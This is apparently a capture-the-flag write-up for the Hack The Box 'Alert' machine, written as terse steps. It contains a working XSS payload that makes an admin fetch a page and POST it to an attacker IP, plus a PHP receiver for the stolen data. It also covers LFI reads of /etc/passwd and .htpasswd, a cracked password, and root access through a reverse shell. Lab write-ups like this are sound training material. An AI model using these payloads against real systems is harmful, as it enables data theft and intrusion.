HTB-Alert

Initial enumeration

Open ports (22, 80, 12227)

Discover alert.htb

Curl

Add alert.htb to /etc/hosts

Visit http://alert.htb

XSS vulnerability

Find a XSS vulnerability

Landing page lets us upload a markdown file

We can ‘view’ the uploaded markdown file

The markdown appears to have been injected into the HTML

Create a malicious md file which creates an alert

Upload the file to find it causes an alert popup

The XSS-infected page can be shared

The page includes a share button with a link to our vulnerable page

Source code:

Rendered HTML (bottom right):

The site admin clicks all links sent in a message

Admin reviews contact messages

Said contact page

Find a password protected subdomain statistics.alert.htb

Subdomain fuzz with ffuf

Credentials are required to access it

Use the XSS to find a LFI at /messages.php?file=

Find the /messages.php page

Request for /messages.php returns empty

Use XSS to have admin request and return /messages.php to attacking machine

<script>fetch('http://alert.htb/messages.php').then(r=>r.text()).then(h=>fetch('http://10.10.14.12',{method:'POST',body:h})).catch(e=>console.error(e))</script>

Then setup a php server with an index.php which records the received data

<?php file_put_contents('received_data.html', file_get_contents('php://input') . "\n", FILE_APPEND); ?>

Send the share link of the uploaded malicious.md file within the contact form and wait for the POST request to be received on a php server setup on the attacking machine

Read the received POST request to find the ?file= parameter

Find a LFI vulnerability in the ?file= parameter

Send a request which tries to read /etc/passwd

It worked

Use the LFI vulnerability to obtain the the login hash for albert for statistics.alert.htb

Use the LFI to read /etc/apache2/sites-available/000-default.conf file

(This file is used to record the document root. It reveals the document root for the virtual host statistics). It also shows the existence of the file statistics.alert.htb/.htpasswd

Received data

Use the LFI to read statistics.alert.htb/.htpasswd

Crack the hash ( albert:manchesterunited)

Use Hashcat (disabling cached results (—potfile-disable))

SSH as albert using the manchesterunited password

SSH

Obtain user

Privilege escalation

Root is running a cron job to execute /opt/website-monitor/monitor.php

psp64 output

Albert is part of the management group & the management group can edit /opt/website-monitor/config/configuration.php

linpeas output

The configuration.php appears to set the document root for the website-monitor programme

Contents of configuration.php

website-monitor is running on internal port 8080

ps aux

netstat -antp

I can't alter alter configuration.php as it triggers php_bot.sh which reverts changes

Pspy64 shows php_bot.sh runs every X seconds when configuration.php is altered

Add a malicious php script to /config and execute to obtain a reverse shell

Setup a port forward to access web server on attacking machine

Check access on attacking machine

Add a malicious php script (pentest monkey) to /config

Access /config/shell.php via port forward to trigger reverse shell

Catch the reverse shell as root

Obtain root.txt